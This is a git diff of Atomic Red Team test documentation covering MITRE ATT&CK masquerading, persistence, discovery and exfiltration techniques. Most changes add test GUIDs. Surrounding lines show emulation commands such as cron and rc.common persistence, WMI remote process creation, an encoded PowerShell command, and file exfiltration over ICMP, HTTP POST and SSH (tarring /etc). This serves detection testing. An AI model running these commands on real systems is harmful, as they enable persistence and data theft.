## Atomic Test #9 - File Extension Masquerading + +auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc + download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched. e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | exe_path | path to exe to use when creating masquerading files | path | C:\Windows\System32\calc.exe| | vbs_path | path of vbs to use when creating masquerading files | path | PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.vbs| diff --git a/atomics/T1036.004/T1036.004.md b/atomics/T1036.004/T1036.004.md index e6448421..7c1348a8 100644 --- a/atomics/T1036.004/T1036.004.md +++ b/atomics/T1036.004/T1036.004.md @@ -14,8 +14,10 @@ Tasks or services contain other fields, such as a description, that adversaries
## Atomic Test #1 - Creating W32Time similar named service using schtasks -Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao" +auto_generated_guid: f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 + +Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao" **Supported Platforms:** Windows @@ -43,8 +45,10 @@ schtasks /tn win32times /delete /f
## Atomic Test #2 - Creating W32Time similar named service using sc -Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao" +auto_generated_guid: b721c6ef-472c-4263-a0d9-37f1f4ecff66 + +Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao" **Supported Platforms:** Windows diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md index 458839a1..aab962e3 100644 --- a/atomics/T1036.005/T1036.005.md +++ b/atomics/T1036.005/T1036.005.md @@ -12,15 +12,17 @@ Adversaries may also use the same icon of the file they are trying to mimic. ## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory. -Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) +auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 + +Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_message | Test message to echo out to the screen | String | Hello from the Atomic Red Team test T1036.005#1| diff --git a/atomics/T1036.006/T1036.006.md b/atomics/T1036.006/T1036.006.md index e8191189..72ccf8b3 100644 --- a/atomics/T1036.006/T1036.006.md +++ b/atomics/T1036.006/T1036.006.md @@ -14,8 +14,10 @@ Adversaries can use this feature to trick users into double clicking benign-look
## Atomic Test #1 - Space After Filename -Space After Filename +auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f + +Space After Filename **Supported Platforms:** macOS diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md index b426a16f..e1e4f50b 100644 --- a/atomics/T1036/T1036.md +++ b/atomics/T1036/T1036.md @@ -12,8 +12,10 @@ Renaming abusable system utilities to evade security monitoring is also a form o
## Atomic Test #1 - System File Copied to Unusual Location -It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory. +auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd + +It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory. **Supported Platforms:** Windows diff --git a/atomics/T1037.001/T1037.001.md b/atomics/T1037.001/T1037.001.md index c1163486..500ffdb3 100644 --- a/atomics/T1037.001/T1037.001.md +++ b/atomics/T1037.001/T1037.001.md @@ -12,16 +12,18 @@ Adversaries may use these scripts to maintain persistence on a single system. De
## Atomic Test #1 - Logon Scripts + +auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231 + Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key that can be viewed in the Registry Editor. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_path | Path to .bat file | String | %temp%\art.bat| | script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt| diff --git a/atomics/T1037.002/T1037.002.md b/atomics/T1037.002/T1037.002.md index b5745668..c642506b 100644 --- a/atomics/T1037.002/T1037.002.md +++ b/atomics/T1037.002/T1037.002.md @@ -12,8 +12,10 @@ Adversaries may use these login hooks to maintain persistence on a single system
## Atomic Test #1 - Logon Scripts - Mac -Mac logon script +auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 + +Mac logon script **Supported Platforms:** macOS diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md index 5e258a38..94d9c640 100644 --- a/atomics/T1037.004/T1037.004.md +++ b/atomics/T1037.004/T1037.004.md @@ -20,10 +20,12 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr
## Atomic Test #1 - rc.common + +auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de + Modify rc.common [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) - **Supported Platforms:** macOS @@ -46,8 +48,10 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e
## Atomic Test #2 - rc.common -Modify rc.common +auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a + +Modify rc.common **Supported Platforms:** Linux @@ -78,8 +82,10 @@ origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /e
## Atomic Test #3 - rc.local -Modify rc.local +auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 + +Modify rc.local **Supported Platforms:** Linux diff --git a/atomics/T1037.005/T1037.005.md b/atomics/T1037.005/T1037.005.md index 808ac4eb..516684aa 100644 --- a/atomics/T1037.005/T1037.005.md +++ b/atomics/T1037.005/T1037.005.md @@ -14,10 +14,12 @@ An adversary can create the appropriate folders/files in the StartupItems direct
## Atomic Test #1 - Add file to Local Library StartupItems + +auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198 + Modify or create an file in /Library/StartupItems [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) - **Supported Platforms:** macOS diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md index b1a21362..e2cb05d4 100644 --- a/atomics/T1040/T1040.md +++ b/atomics/T1040/T1040.md @@ -20,17 +20,19 @@ Network sniffing may also reveal configuration details, such as running services
## Atomic Test #1 - Packet Capture Linux + +auto_generated_guid: 7fe741f7-b265-4951-a7c7-320889083b3e + Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | ens33| @@ -50,7 +52,7 @@ tshark -c 5 -i #{interface} ##### Description: Check if at least one of the tools are installed on the machine. ##### Check Prereq Commands: ```bash -if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; +if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; ``` ##### Get Prereq Commands: ```bash @@ -64,17 +66,19 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
## Atomic Test #2 - Packet Capture macOS + +auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608 + Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A. - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | en0A| @@ -94,7 +98,7 @@ if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi; ##### Description: Check if at least one of the tools are installed on the machine. ##### Check Prereq Commands: ```bash -if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; +if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; ``` ##### Get Prereq Commands: ```bash @@ -108,18 +112,20 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
## Atomic Test #3 - Packet Capture Windows Command Prompt + +auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca + Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark installed. Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet". - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | Ethernet| | wireshark_url | wireshark installer download URL | url | https://1.eu.dl.wireshark.org/win64/Wireshark-win64-3.4.5.exe| @@ -142,7 +148,7 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac ##### Description: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". ##### Check Prereq Commands: ```powershell -if (test-path "#{tshark_path}") {exit 0} else {exit 1} +if (test-path "#{tshark_path}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -152,7 +158,7 @@ Start-Process $env:temp\wireshark_installer.exe /S ##### Description: npcap must be installed. ##### Check Prereq Commands: ```powershell -if (test-path "#{npcap_path}") {exit 0} else {exit 1} +if (test-path "#{npcap_path}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -167,9 +173,11 @@ Start-Process $env:temp\npcap_installer.exe
## Atomic Test #4 - Windows Internal Packet Capture + +auto_generated_guid: b5656f67-d67f-4de8-8e62-b5581630f528 + Uses the built-in Windows packet capture After execution you should find a file named trace.etl and trace.cab in the temp directory - **Supported Platforms:** Windows diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index 6da6944c..f921f6a0 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -18,10 +18,12 @@ Within cloud environments, adversaries may attempt to discover services running
## Atomic Test #1 - Port Scan + +auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540 + Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout. - **Supported Platforms:** Linux, macOS @@ -47,17 +49,19 @@ done
## Atomic Test #2 - Port Scan Nmap + +auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f + Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout. - **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | host | Host to scan. | string | 192.168.1.1| | port | Ports to scan. | string | 80| @@ -80,7 +84,7 @@ nc -nv #{host} #{port} ##### Description: Check if nmap command exists on the machine ##### Check Prereq Commands: ```sh -if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; +if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```sh @@ -94,15 +98,17 @@ echo "Install nmap on the machine to run the test."; exit 1;
## Atomic Test #3 - Port Scan NMap for Windows -Scan ports to check for listening ports for the local host 127.0.0.1 +auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df + +Scan ports to check for listening ports for the local host 127.0.0.1 **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | nmap_url | NMap installer download URL | url | https://nmap.org/dist/nmap-7.80-setup.exe| | host_to_scan | The host to scan with NMap | string | 127.0.0.1| @@ -122,7 +128,7 @@ nmap #{host_to_scan} ##### Description: NMap must be installed ##### Check Prereq Commands: ```powershell -if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} +if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -137,15 +143,17 @@ Start-Process $env:temp\nmap-7.80-setup.exe /S
## Atomic Test #4 - Port Scan using python -Scan ports to check for listening ports with python +auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c + +Scan ports to check for listening ports with python **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | host_ip | Host to scan. | string | 127.0.0.1| | filename | Location of the project file | Path | PathToAtomicsFolder\T1046\src\T1046.py| @@ -165,7 +173,7 @@ python #{filename} -i #{host_ip} ##### Description: Check if python exists on the machine ##### Check Prereq Commands: ```powershell -if (python --version) {exit 0} else {exit 1} +if (python --version) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md index ca7319d7..eb510624 100644 --- a/atomics/T1047/T1047.md +++ b/atomics/T1047/T1047.md @@ -26,9 +26,11 @@ An adversary can use WMI to interact with local and remote systems and use it as
## Atomic Test #1 - WMI Reconnaissance Users + +auto_generated_guid: c107778c-dcf5-47c5-af2e-1d058a3df3ea + An adversary might use WMI to list all local User Accounts. When the test completes , there should be local user accounts information displayed on the command line. - **Supported Platforms:** Windows @@ -51,9 +53,11 @@ wmic useraccount get /ALL /format:csv
## Atomic Test #2 - WMI Reconnaissance Processes + +auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 + An adversary might use WMI to list Processes running on the compromised host. When the test completes , there should be running processes listed on the command line. - **Supported Platforms:** Windows @@ -76,9 +80,11 @@ wmic process get caption,executablepath,commandline /format:csv
## Atomic Test #3 - WMI Reconnaissance Software + +auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 + An adversary might use WMI to list installed Software hotfix and patches. When the test completes, there should be a list of installed patches and when they were installed. - **Supported Platforms:** Windows @@ -101,19 +107,21 @@ wmic qfe get description,installedOn /format:csv
## Atomic Test #4 - WMI Reconnaissance List Remote Services + +auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 + An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreacheable - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | node | Ip Address | String | 127.0.0.1| | service_search_string | Name Of Service | String | Spooler| @@ -135,16 +143,18 @@ wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
## Atomic Test #5 - WMI Execute Local Process + +auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 + This test uses wmic.exe to execute a process on the local host. When the test completes , a new process will be started locally .A notepad application will be started when input is left on default. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_to_execute | Name or path of process to execute. | String | notepad.exe| @@ -169,17 +179,19 @@ wmic process where name='#{process_to_execute}' delete >nul 2>&1
## Atomic Test #6 - WMI Execute Remote Process + +auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b + This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. To clean up, provide the same node input as the one provided to run the test A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | node | Ip Address | String | 127.0.0.1| | user_name | Username | String | DOMAIN\Administrator| @@ -207,6 +219,9 @@ wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name
## Atomic Test #7 - Create a Process using WMI Query and an Encoded Command + +auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c + Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand Powershell -nop -exec bypass -EncodedCommand Where the –EncodedCommand, once decoded, would resemble: @@ -214,7 +229,6 @@ Where the –EncodedCommand, once decoded, would resemble: The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe You should expect to see notepad.exe running after execution of this test. [Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/) - **Supported Platforms:** Windows @@ -237,16 +251,18 @@ powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhA
## Atomic Test #8 - Create a Process using obfuscated Win32_Process + +auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 + This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic. [Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | new_class | Derived class name | String | Win32_Atomic| | process_to_execute | Name or path of process to execute. | String | notepad.exe| diff --git a/atomics/T1048.003/T1048.003.md b/atomics/T1048.003/T1048.003.md index 7a658ca8..0390ce51 100644 --- a/atomics/T1048.003/T1048.003.md +++ b/atomics/T1048.003/T1048.003.md @@ -20,10 +20,12 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
## Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP + +auto_generated_guid: 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff + A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337. Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded. - **Supported Platforms:** macOS, Linux @@ -54,17 +56,19 @@ Upon successful execution, sh will be used to make a directory (/tmp/victim-stag
## Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP + +auto_generated_guid: dd4b4421-2e25-4593-90ae-7021947ad12e + Exfiltration of specified file over ICMP protocol. Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe| | ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1| @@ -86,8 +90,10 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
## Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS -Exfiltration of specified file over DNS protocol. +auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 + +Exfiltration of specified file over DNS protocol. **Supported Platforms:** Linux @@ -116,16 +122,18 @@ Exfiltration of specified file over DNS protocol.
## Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP + +auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c + Exfiltration of specified file over HTTP. Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe| | ip_address | Destination IP address where the data should be sent | String | http://127.0.0.1| @@ -148,16 +156,18 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
## Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP + +auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9 + Exfiltration of specified file over SMTP. Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe| | sender | The email address of the sender | String | test@corp.com| diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md index 6e6ecf17..e60fdc42 100644 --- a/atomics/T1048/T1048.md +++ b/atomics/T1048/T1048.md @@ -16,19 +16,21 @@ Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network pr
## Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH + +auto_generated_guid: f6786cc8-beda-4915-a4d6-ac2f193bb988 + Input a domain and test Exfiltration over SSH Remote to Local Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file. - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | target SSH domain | url | target.example.com| @@ -49,19 +51,21 @@ ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
## Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH + +auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 + Input a domain and test Exfiltration over SSH Local to Remote Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output. - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username for domain | string | atomic| | password | password for user | string | atomic| diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md index 414e5e25..192508b7 100644 --- a/atomics/T1049/T1049.md +++ b/atomics/T1049/T1049.md @@ -20,10 +20,12 @@ Utilities and commands that acquire this information include [netstat](https://a
## Atomic Test #1 - System Network Connections Discovery + +auto_generated_guid: 0940a971-809a-48f1-9c4d-b1d785e96ee5 + Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout. - **Supported Platforms:** Windows @@ -48,10 +50,12 @@ net sessions
## Atomic Test #2 - System Network Connections Discovery with PowerShell + +auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a + Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout. - **Supported Platforms:** Windows @@ -74,10 +78,12 @@ Get-NetTCPConnection
## Atomic Test #3 - System Network Connections Discovery Linux & MacOS + +auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 + Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout. - **Supported Platforms:** Linux, macOS @@ -99,7 +105,7 @@ who -a ##### Description: Check if netstat command exists on the machine ##### Check Prereq Commands: ```sh -if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; +if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```sh @@ -113,17 +119,19 @@ echo "Install netstat on the machine."; exit 1;
## Atomic Test #4 - System Discovery using SharpView + +auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9 + Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | SharpView_url | sharpview download URL | url | https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true| | SharpView | Path of the executable opensource redteam tool used for the performing this atomic. | path | PathToAtomicsFolder\T1049\bin\SharpView.exe| @@ -146,7 +154,7 @@ foreach ($syntax in $syntaxList) { ##### Description: Sharpview.exe must exist on disk at specified location (#{SharpView}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{SharpView}) {exit 0} else {exit 1} +if (Test-Path #{SharpView}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1053.001/T1053.001.md b/atomics/T1053.001/T1053.001.md index 03205105..77547ae1 100644 --- a/atomics/T1053.001/T1053.001.md +++ b/atomics/T1053.001/T1053.001.md @@ -12,15 +12,17 @@ An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux envi
## Atomic Test #1 - At - Schedule a job -This test submits a command to be run in the future by the `at` daemon. +auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e + +This test submits a command to be run in the future by the `at` daemon. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | time_spec | Time specification of when the command should run | String | now + 1 minute| | at_command | The command to be run | String | echo Hello from Atomic Red Team| @@ -40,7 +42,7 @@ echo "#{at_command}" | at #{time_spec} ##### Description: The `at` and `atd` executables must exist in the PATH ##### Check Prereq Commands: ```sh -which at && which atd +which at && which atd ``` ##### Get Prereq Commands: ```sh @@ -49,7 +51,7 @@ echo 'Please install `at` and `atd`; they were not found in the PATH (Package na ##### Description: The `atd` daemon must be running ##### Check Prereq Commands: ```sh -systemctl status atd || service atd status +systemctl status atd || service atd status ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1053.002/T1053.002.md b/atomics/T1053.002/T1053.002.md index 63774d6d..0e22c703 100644 --- a/atomics/T1053.002/T1053.002.md +++ b/atomics/T1053.002/T1053.002.md @@ -14,11 +14,13 @@ Note: The at.exe command line utility has been deprecated in curren
## Atomic Test #1 - At.exe Scheduled task + +auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 + Executes cmd.exe Note: deprecated in Windows 8+ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. - **Supported Platforms:** Windows diff --git a/atomics/T1053.003/T1053.003.md b/atomics/T1053.003/T1053.003.md index 7cda336c..47c5272a 100644 --- a/atomics/T1053.003/T1053.003.md +++ b/atomics/T1053.003/T1053.003.md @@ -16,15 +16,17 @@ An adversary may use cron in Linux or Unix environments to execute
## Atomic Test #1 - Cron - Replace crontab with referenced file -This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks. +auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75 + +This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command | Command to execute | string | /tmp/evil.sh| | tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil| @@ -51,15 +53,17 @@ crontab /tmp/notevil
## Atomic Test #2 - Cron - Add script to all cron subfolders -This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. +auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 + +This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log| | cron_script_name | Name of file to store in cron folder | string | persistevil| @@ -91,15 +95,17 @@ rm /etc/cron.weekly/#{cron_script_name}
## Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder -This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. +auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + +This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log| | cron_script_name | Name of file to store in /var/spool/cron/crontabs folder | string | persistevil| diff --git a/atomics/T1053.004/T1053.004.md b/atomics/T1053.004/T1053.004.md index 14817e59..bed322f3 100644 --- a/atomics/T1053.004/T1053.004.md +++ b/atomics/T1053.004/T1053.004.md @@ -12,15 +12,17 @@ An adversary may use the launchd daemon in macOS environments to sc
## Atomic Test #1 - Event Monitor Daemon Persistence -This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. +auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e + +This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_location | evil plist location | path | $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist| | script_destination | Path where to move the evil plist | path | /etc/emond.d/rules/atomicredteam_T1053_004.plist| diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md index a290333a..9fd444d6 100644 --- a/atomics/T1053.005/T1053.005.md +++ b/atomics/T1053.005/T1053.005.md @@ -24,9 +24,11 @@ An adversary may use Windows Task Scheduler to execute programs at system startu
